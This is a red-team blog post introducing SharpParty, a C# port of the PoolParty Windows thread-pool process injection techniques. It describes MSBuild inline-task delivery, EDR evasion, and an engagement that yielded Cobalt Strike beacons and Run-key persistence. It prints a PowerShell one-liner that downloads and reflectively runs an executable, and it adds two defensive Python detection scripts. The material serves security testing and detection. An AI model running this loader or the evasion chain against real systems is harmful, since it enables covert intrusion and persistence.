November 11, 2025 4 Minute Read
This article originally appeared on the Stroz Friedberg, A LevelBlue Company, blog site.
As Anti-Virus and EDR solutions improve in detection and response capabilities, the job of a red teamer can become quite arduous. Malware payloads and techniques that once dominated networks have failed the test of time as EDR becomes aware of them. If your initial access payloads are detected immediately, your six-week long red team could be dead on arrival. Additionally, real-world threat actors have an abundance of time and resources; just imagine all the payloads, techniques, and 0-days that a sophisticated threat actor group may have developed over the years. It is essential for red teams to continuously develop their tactics, techniques, and procedures (TTPs) for the purpose of emulating real-life threat actors that are ever evolving.
In this blog post, Stroz Friedberg, a LevelBlue company, introduces an addition to the red teamers’ toolkit called “SharpParty” – a C# implementation of the process injection techniques dubbed “PoolParty”.
We want to be very clear here: Stroz Friedberg did not create PoolParty nor did Stroz Friedberg extend the research into Windows Thread Pools. Rather, Stroz Friedberg simply translated the original source code of SafeBreach Labs from C++ to C#. The goal here is to give red teamers more options when picking their payloads. You can download SharpParty from our GitHub repository.
Process Injection
Before we dive into PoolParty, we must understand what process injection is first. Process injection is a relatively simple concept: inject code into another process. The purpose of injecting code into another process is to hide and obscure malicious activities. The actual implementation of process injection, however, is not as simple.
If you would like to learn more about process injection, please refer to the following URLs:
- https://attack.mitre.org/techniques/T1055/
- https://github.com/plackyhacker/Shellcode-Injection-Techniques
PoolParty
SafeBreach Labs masterfully exemplified the necessity of continuous TTP development through the release of “PoolParty” – a suite of process injection techniques that target Windows Thread Pools. With this research, SafeBreach Labs was able to bypass five of the leading EDR vendors. They also released a Proof-of-Concept GitHub repository, with source code written in C++.
In short, PoolParty injects code into processes by crafting and inserting legitimate work items into a process’s thread pool. A work item is a structure that contains a task specification, including specific conditions and code to execute when these conditions are met. Injected work items effectively act as the execution primitive, because the work item will execute our code when its conditions are met. For example, a work item can perform an action when a file is modified. The file modification in this example is the execution primitive and we do not have to manually start the execution via something like “CreateRemoteThread”, which is a well-known indicator of process injection.
Motivation
The primary motivation for a C# implementation is to allow the PoolParty techniques to be used in tools that leverage inline MSBuild tasks in XML files. A Task XML file can include embedded C# code that, when passed to “msbuild.exe”, will be compiled and executed. While Task XMLs do support C++ (the language the original PoC was written in), they are only supported when the “CppCodeProvider.dll” assembly is present on the target machine. This DLL is included within some Visual Studio installations and is not guaranteed to be present on Windows machines by default. To ensure our payloads would detonate on practically any Windows host, we would need to implement the PoolParty technique in C#.
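From a defender's side, the same inline-task mechanism is something worth being able to recognise on disk or in a quarantined sample. The following is an added example, not code from the original post or from the SharpParty project: a small Python triage script that parses an MSBuild project file and reports any UsingTask elements whose TaskFactory compiles embedded source (CodeTaskFactory or RoslynCodeTaskFactory), together with the language of each Code block. The two project files it scans are constructed samples; the harmless inline task body only logs a message.

```python
"""Triage MSBuild project files for inline tasks (added defensive example)."""
import xml.etree.ElementTree as ET

# Task factories that compile source embedded in the project file itself.
INLINE_TASK_FACTORIES = {"CodeTaskFactory", "RoslynCodeTaskFactory"}

# Constructed sample: a project carrying one C# inline task with a harmless body.
INLINE_TASK_PROJECT = r"""<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build">
    <HelloTask />
  </Target>
  <UsingTask TaskName="HelloTask" TaskFactory="CodeTaskFactory"
             AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.Core.dll">
    <Task>
      <Code Type="Fragment" Language="cs">
        Log.LogMessage("inline task body");
      </Code>
    </Task>
  </UsingTask>
</Project>
"""

# Constructed sample: an ordinary SDK-style project with no embedded source.
PLAIN_PROJECT = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup><TargetFramework>net8.0</TargetFramework></PropertyGroup>
</Project>
"""


def _local_name(tag: str) -> str:
    """Strip the XML namespace so namespaced and SDK-style projects parse alike."""
    return tag.rsplit("}", 1)[-1]


def find_inline_tasks(project_xml: str) -> list[dict]:
    """Return one record per <Code> block hosted by an inline-task <UsingTask>."""
    root = ET.fromstring(project_xml)
    findings = []
    for using_task in root.iter():
        if _local_name(using_task.tag) != "UsingTask":
            continue
        factory = using_task.get("TaskFactory", "")
        if factory not in INLINE_TASK_FACTORIES:
            continue
        for code in using_task.iter():
            if _local_name(code.tag) != "Code":
                continue
            findings.append({
                "task": using_task.get("TaskName", ""),
                "factory": factory,
                # MSBuild compiles the block as C# when no Language is given.
                "language": code.get("Language", "cs").lower(),
                "type": code.get("Type", "Fragment"),
                "source_chars": len((code.text or "").strip()),
            })
    return findings


def summarize(project_xml: str) -> str:
    """One-line verdict suitable for a triage queue or an alert enrichment field."""
    findings = find_inline_tasks(project_xml)
    if not findings:
        return "no inline tasks"
    langs = sorted({f["language"] for f in findings})
    return f"{len(findings)} inline task(s), language(s): {', '.join(langs)}"


if __name__ == "__main__":
    print(summarize(INLINE_TASK_PROJECT))
    print(summarize(PLAIN_PROJECT))
```

A project file that ships with embedded source is legitimate in build pipelines, so the output is a triage signal rather than a verdict; the language field matters because, as the post notes, a C++ inline task only compiles where CppCodeProvider.dll is present, whereas a C# one compiles on practically any Windows host.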
Additionally, a C# implementation of PoolParty can be reflectively loaded into memory via PowerShell:
$data = (new-object net.webclient).downloaddata('http://127.0.0.1/sharpparty.exe');
$assem = [System.Reflection.Assembly]::Load($data);
[SharpParty.Program]::Main("1 666".Split());
Lastly, as offensive C# tooling continues to grow in popularity, a C# PoolParty implementation can be integrated into other offensive tooling as part of varying attack chains.
For these reasons, Stroz Friedberg began implementation of the “PoolParty” technique in C# – SharpParty.
Efficacy Against EDR
During our testing, SharpParty was consistently able to bypass Microsoft Defender for Endpoint (MDE) initially. We submitted a report to Microsoft that demonstrated the bypass in March of 2025, which they validated and subsequently implemented detections for. Since then, we have observed an increase in the number of detections on SharpParty. Other EDR systems have detected and sometimes prevented the execution of SharpParty, largely based on the malicious use of “msbuild.exe” as well as an unspecified process injection technique.
While SharpParty inline tasks have seen increased detections from EDR recently, there are a few things worth noting:
- SafeBreach Labs publicly released their research on process injection via Windows Thread Pools, enabling EDR vendors to implement detections and monitoring for this technique.
- The use of inline tasks and “msbuild.exe” is a relatively well-known technique.
- There is room for further development that could improve the payload’s efficacy against EDR.
Ultimately our goal is to give red teams one more item in their toolkit, one more means to meet an end, another test case that evaluates threat detection capabilities.
Success Story
During our research, we had the opportunity to further test our code on a client engagement. The following is a breakdown of our payload:
- A Task XML file with C# inline task that contains encrypted SharpParty code and helper functions to fetch the decryption key, decrypt the code, then compile and execute the decrypted code.
- The beacon shellcode is nested within an additional layer of encryption.
- HTTP Keying is used to retrieve and validate the decryption key, ensuring connectivity to the C2 server.
The execution flow of the payload is depicted in the diagram below:
Figure 1. Payload execution flow diagram.
How the dropper executes “msbuild.exe” on the task XML is dependent on various conditions and is outside the scope of this blog post.
With everything tested and ready to go, we joined a call with the client to screenshare the malware detonation. We disguised the payload in such a way that, from the victim’s perspective, it looked like they had downloaded a ZIP file and opened a PDF. Under the hood, we successfully executed SharpParty and obtained a Cobalt Strike beacon. After establishing the C2 channel, the client received no alarms on their side at that moment. After about 10 minutes, we suggested a test case involving persistence via registry run keys to check whether this activity would be detected. The client agreed, and we performed the test case live on the call, setting an autorun key to execute the same SharpParty payload. Then we logged out of the workstation, logged back in, and received the second beacon.
The client was understandably concerned, seeing as we had established two C2 beacons and they had not received any detections. Thirty minutes after detonation, the EDR picked up the malicious use of “msbuild.exe” and an unspecified malicious payload in our target process, and the client was alerted.
While ultimately this code was still caught, there are two key takeaways:
- The execution of “msbuild.exe” is what was picked up by EDR.
- There were 30 minutes between detonation and detection. While relatively small, this gap may be large enough for a threat actor to pivot within the network and maintain their access.
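The two takeaways above, plus the PowerShell loader shown earlier, describe three observable events: msbuild.exe building a project file from a user-writable location, PowerShell loading an assembly from downloaded bytes, and a Run key pointing at msbuild.exe. The following is an added example, not code from the original post or from the SharpParty project: a Python script that runs those three detection rules over constructed JSON-lines telemetry and measures the gap between the first flagged event and the time an alert fired. The event schema (ts, type, image, parent, cmdline, key, name, value) is an assumption modelled on a typical EDR export, and every event, path and timestamp in the sample is made up.

```python
"""Run three detection rules over constructed EDR-style telemetry (added defensive example)."""
import json
import re
from datetime import datetime
from pathlib import PureWindowsPath

# Constructed sample telemetry, one JSON object per line. Field names are an assumption.
SAMPLE_EVENTS = r"""
{"ts": "2025-03-10T14:00:02Z", "type": "process", "image": "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe", "parent": "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\devenv.exe", "cmdline": "MSBuild.exe C:\\src\\app\\app.csproj"}
{"ts": "2025-03-10T14:02:11Z", "type": "process", "image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe", "parent": "C:\\Windows\\explorer.exe", "cmdline": "msbuild.exe C:\\Users\\jdoe\\Downloads\\invoice\\report.xml"}
{"ts": "2025-03-10T14:03:40Z", "type": "process", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent": "C:\\Windows\\explorer.exe", "cmdline": "powershell.exe -nop -c $d=(new-object net.webclient).downloaddata('http://127.0.0.1/x.exe');[System.Reflection.Assembly]::Load($d)"}
{"ts": "2025-03-10T14:05:00Z", "type": "process", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent": "C:\\Windows\\explorer.exe", "cmdline": "powershell.exe Get-Process"}
{"ts": "2025-03-10T14:12:30Z", "type": "registry", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "name": "Updater", "value": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\Users\\jdoe\\AppData\\Roaming\\report.xml"}
"""

# Rule 1: msbuild.exe given a project file that lives in a user-writable location.
USER_WRITABLE_PATH = re.compile(r"\\(Users|ProgramData|Windows\\Temp)\\", re.I)
PROJECT_FILE = re.compile(r"\.(xml|csproj|proj|targets)\b", re.I)
# Rule 2: PowerShell loading an assembly from bytes it just downloaded.
REFLECTIVE_LOAD = re.compile(r"Reflection\.Assembly\]::Load\b|\.downloaddata\(", re.I)
# Rule 3: a Run/RunOnce value whose command launches msbuild.exe.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)


def exe_name(path: str) -> str:
    """Basename of a Windows path, lower-cased, regardless of the host OS."""
    return PureWindowsPath(path).name.lower()


def evaluate(event: dict) -> list[str]:
    """Return the names of every rule the event matches (possibly none)."""
    rules = []
    if event.get("type") == "process":
        image = exe_name(event.get("image", ""))
        cmdline = event.get("cmdline", "")
        if image == "msbuild.exe" and PROJECT_FILE.search(cmdline) and USER_WRITABLE_PATH.search(cmdline):
            rules.append("msbuild-project-in-user-writable-path")
        if image in {"powershell.exe", "pwsh.exe"} and REFLECTIVE_LOAD.search(cmdline):
            rules.append("powershell-reflective-assembly-load")
    elif event.get("type") == "registry":
        if RUN_KEY.search(event.get("key", "")) and "msbuild.exe" in event.get("value", "").lower():
            rules.append("run-key-persistence-via-msbuild")
    return rules


def scan(jsonl: str) -> list[dict]:
    """Apply the rules to every non-blank line and collect hits in event order."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        for rule in evaluate(event):
            hits.append({"ts": event["ts"], "rule": rule,
                         "detail": event.get("cmdline") or event.get("value")})
    return hits


def _parse_ts(ts: str) -> datetime:
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def detection_gap_minutes(hits: list[dict], alert_ts: str) -> float:
    """Minutes between the earliest flagged event and the time the alert fired."""
    first = min(_parse_ts(h["ts"]) for h in hits)
    return (_parse_ts(alert_ts) - first).total_seconds() / 60


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for h in found:
        print(h["ts"], h["rule"], "<-", h["detail"])
    print("gap to alert:", detection_gap_minutes(found, "2025-03-10T14:32:11Z"), "minutes")
```

The first event, msbuild.exe launched by devenv.exe on a project under C:\src, is deliberately left unflagged: msbuild.exe is a normal developer tool, so the rule keys on where the project file lives and what launched the build rather than on the binary alone. Measuring the gap between the first flagged event and the alert is the defender's view of the 30-minute window described above.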
Conclusion
In summary, we have developed a C# implementation of PoolParty based on the incredible work from SafeBreach Labs, provided motivation for its existence, and shared a success story. As always, there is room for improvement. We have room to grow in terms of adding more variants, perhaps even discovering new ones, and improving the efficacy against EDR products. Our goal in publishing this blog post and open sourcing SharpParty is to share knowledge with the security community and provide avenues for future research and development.
About the Author
Will Rabb is Technical Manager, Security Testing, Stroz Friedberg, a LevelBlue Company.